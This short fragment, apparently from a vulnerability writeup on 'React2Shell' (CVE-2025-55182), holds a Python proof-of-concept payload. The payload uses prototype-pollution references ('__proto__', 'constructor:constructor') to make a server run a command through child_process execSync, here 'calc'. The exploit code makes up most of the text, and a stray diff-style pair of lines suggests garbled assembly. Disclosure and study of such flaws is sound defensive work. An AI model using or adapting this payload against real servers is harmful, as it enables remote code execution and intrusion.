React2Shell | CVE-2025-55182

 1crafted_chunk = { 2 "then": "$1:__proto__:then", 3 "status": "resolved_model", 4 "reason": -1, 5 "value": '{"then": "$B0"}', 6 "_response": { 7 "_prefix": f"process.mainModule.require('child_process').execSync('calc');", 8 "_formData": { 9 "get": "$1:constructor:constructor", 10 }, 11 }, 12} 13 14files = { 15 "0": (None, json.dumps(crafted_chunk)), 16 "1": (None, '"$@0"'), 17}

-You can use the following python script as a PoC:
+You can use the following Python script as a proof of concept:

 React2Shell.py